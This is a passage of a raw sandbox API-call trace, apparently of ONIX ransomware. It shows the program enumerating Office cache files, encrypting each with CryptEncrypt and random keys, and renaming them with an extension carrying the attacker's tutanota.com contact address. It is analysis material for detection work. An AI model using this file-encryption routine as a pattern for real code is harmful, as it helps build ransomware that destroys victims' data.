lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0103.482] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1857) returned 1 [0103.482] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x741 [0103.482] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0103.482] GetProcessHeap () returned 0x410000 [0103.482] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0103.482] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0103.482] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0103.484] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0103.485] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0103.486] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x741) returned 0xf50048 [0103.486] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x741) returned 0xf50798 [0103.487] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.487] ReadFile (in: hFile=0x488, lpBuffer=0xf50048, nNumberOfBytesToRead=0x741, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x741, lpOverlapped=0x0) returned 1 [0103.487] SetFilePointer (in: hFile=0x488, lDistanceToMove=-1857, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.487] WriteFile (in: hFile=0x488, lpBuffer=0xf50798*, nNumberOfBytesToWrite=0x741, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50798*, lpNumberOfBytesWritten=0x367f44c*=0x741, lpOverlapped=0x0) returned 1 [0103.488] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0103.488] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50798 | out: hHeap=0x410000) returned 1 [0103.488] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x741, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.488] CloseHandle (hObject=0x488) returned 1 [0103.489] GetProcessHeap () returned 0x410000 [0103.489] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0103.489] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0103.492] GetProcessHeap () returned 0x410000 [0103.492] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449878 | out: hHeap=0x410000) returned 1 [0103.492] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0103.492] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0103.492] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473118 | out: hHeap=0x410000) returned 1 [0103.492] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8c333b00, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8c333b00, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe86b5a80, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xa0200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="msvcr90.dll", cAlternateFileName="")) returned 1 [0103.492] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.492] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0103.492] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0103.492] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.492] GetLastError () returned 0x0 [0103.492] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0103.493] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0103.493] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xa0200, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.493] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.493] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0103.494] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.494] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0103.495] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0103.495] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0103.495] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll", dwFileAttributes=0x80) returned 1 [0103.495] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 75 [0103.495] GetProcessHeap () returned 0x410000 [0103.495] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x467908 [0103.495] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" [0103.495] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0103.495] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=655872) returned 1 [0103.495] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xa0200 [0103.495] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0103.495] GetProcessHeap () returned 0x410000 [0103.495] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0103.495] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0103.496] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0103.497] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0103.498] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0103.499] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa0200) returned 0x2680020 [0103.500] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa0200) returned 0x2b30020 [0103.500] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.500] ReadFile (in: hFile=0x488, lpBuffer=0x2680020, nNumberOfBytesToRead=0xa0200, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2680020*, lpNumberOfBytesRead=0x367f44c*=0xa0200, lpOverlapped=0x0) returned 1 [0103.527] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xa0200, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0103.527] CloseHandle (hObject=0x488) returned 1 [0103.529] GetProcessHeap () returned 0x410000 [0103.529] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0103.529] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0103.531] GetProcessHeap () returned 0x410000 [0103.531] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0103.531] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0103.531] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0103.531] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0103.531] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3ba05100, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3ba05100, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7e3b3f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd79282, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeLR.cab", cAlternateFileName="")) returned 1 [0103.531] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0103.531] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0103.531] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0103.531] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0103.531] GetLastError () returned 0x0 [0103.532] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0103.532] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0103.532] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd79282, nNumberOfBytesToLockHigh=0x0) returned 1 [0103.532] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0103.532] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0103.534] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0103.534] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0103.534] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0103.534] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0103.534] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", dwFileAttributes=0x80) returned 1 [0103.535] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 76 [0103.535] GetProcessHeap () returned 0x410000 [0103.535] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0103.535] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" [0103.535] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0103.535] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=14127746) returned 1 [0103.535] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xd79282 [0103.535] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0103.535] GetProcessHeap () returned 0x410000 [0103.535] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0103.535] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0103.535] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0103.537] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0103.538] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0103.541] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd79282) returned 0x3680020 [0103.541] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd79282) returned 0x4400020 [0103.542] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.542] ReadFile (in: hFile=0x488, lpBuffer=0x3680020, nNumberOfBytesToRead=0xd79282, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0xd79282, lpOverlapped=0x0) returned 1 [0104.280] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd79282, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.280] CloseHandle (hObject=0x488) returned 1 [0104.288] GetProcessHeap () returned 0x410000 [0104.288] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.288] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.291] GetProcessHeap () returned 0x410000 [0104.291] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.291] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.291] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.291] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0104.291] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cd17e00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3cd17e00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c4ba40, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x387e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUI.msi", cAlternateFileName="OFFICE~2.MSI")) returned 1 [0104.291] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.291] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.291] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0104.291] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.291] GetLastError () returned 0x0 [0104.291] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0104.291] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.292] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x387e00, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.292] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.292] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.293] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.293] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.294] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.294] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.294] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi", dwFileAttributes=0x80) returned 1 [0104.294] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 77 [0104.294] GetProcessHeap () returned 0x410000 [0104.294] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10a) returned 0x467908 [0104.294] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" [0104.294] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.294] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=3702272) returned 1 [0104.294] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x387e00 [0104.294] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.294] GetProcessHeap () returned 0x410000 [0104.294] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.295] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.295] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.296] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.297] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.298] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x387e00) returned 0x3680020 [0104.299] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x387e00) returned 0x3a10020 [0104.299] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.299] ReadFile (in: hFile=0x488, lpBuffer=0x3680020, nNumberOfBytesToRead=0x387e00, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, 